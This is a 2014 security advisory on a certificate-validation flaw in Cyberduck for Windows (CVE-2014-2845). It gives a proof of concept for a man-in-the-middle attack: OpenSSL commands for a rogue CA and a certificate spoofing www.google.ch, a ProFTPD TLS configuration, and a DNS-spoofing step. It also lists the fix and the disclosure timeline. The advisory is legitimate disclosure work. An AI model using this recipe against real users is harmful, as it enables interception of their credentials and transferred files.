Advisory - Cyberduck

2014-05-06: ADVISORY CYBERDUCK

Advisory ID: SYSS-2014-004

Product: Cyberduck

Affected Version(s): 4.4.3 (14140) (Windows only)

Not Affected Versions(s): 4.4.3 (14140) and 4.2.1 (9350) (both OS X 10.9.2)

Tested Version(s): 4.4.3 (Windows 7 32 bit and Windows 8.1 64 bit)

Vulnerability Type: X.509 validation

Risk Level: Medium Solution

Status: Fixed

Vendor Notification: 2014-04-08

Solution Date: 2014-04-10

Public Disclosure: 2014-05-06

CVE Reference: CVE-2014-2845

Author of Advisory: Micha Borrmann (SySS GmbH)   

 

Overview

Cyberduck (Windows versions only) accepts X.509 server certificates from any CA, also when they are not in the certificate store and not sent from the FTP server; only self-signed certificates are not accepted.  

Vulnerability Details

A user can not recognize an easy to perform man-in-the-middle attack, because the client does not validate the certificate chain of the servers X.509 certificate. In a networking environment that is not trustworthy, like a wifi network, using FTP AUTH TLS with Cyberduck the server's identity can not be trusted.  

Proof of Concept (PoC):

With OpenSSL generate a key for a CA and for the server and create the certificates:  

 

openssl genrsa -out ca4096.key 4096
openssl genrsa -out 2048.key 2048 
chmod 400 *.key 
mkdir demoCA 
mkdir demoCA/newcerts 
touch demoCA/index.txt echo ffaabb > demoCA/serial 
openssl req -key ca4096.key -out ca4096.crt -new -x509 -subj "/C=DE/ST=BW/L=/O=SYSS/OU=/CN=CA" -days 3652 
openssl req -key 2048.key -out 2048.csr -new -subj "/C=DE/ST=BW/L=/O=SYSS/OU=/CN=www.google.ch" -days 365 
openssl ca -keyfile ca4096.key -cert ca4096.crt -in 2048.csr -out 2048.crt -days 365  

 

 

Put the key (2048.key) and the X.509 certificate (2048.crt) to a ProFTP server and modify the configuration  

 

<IfModule mod_tls.c>
TLSEngine on 
TLSLog /var/log/proftpd/tls.log 
TLSProtocol SSLv23 
TLSRSACertificateFile /etc/ssl/2048.crt 
TLSRSACertificateKeyFile /etc/ssl/2048.key 
TLSVerifyClient off 
TLSRequired on 
</IfModule>

 

 

Perform a DNS spoofing for www.google.ch and use Cyberduck to access this system with FTP-SSL (Explicit AUTH TLS).   

 

Solution

Upgrade to Cyberduck 4.4.4  

Disclosure Timeline   

April 08, 2014 Vulnerability discovered

April 08, 2014 Vulnerability reported to vendor

April 08, 2014 First Vendor response

April 10, 2014 Bug was confirmed and fixed by the vendor

April 10, 2014 Bugfix could be confirmed with Cyberduck 4.4.4 (14478)

April 24, 2014 Cyberduck 4.4.4 (14505) was released [1]  

 

References

[1] https://cyberduck.io/changelog/   

Credits

Security vulnerability found by Micha Borrmann of the SySS GmbH.  

Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible.The latest version of this security advisory is available on the SySS web site.  

 

Copyright

 

Creative Commons - Attribution (by) - Version 3.0 URL: creativecommons.org/licenses/by/3.0/deed.en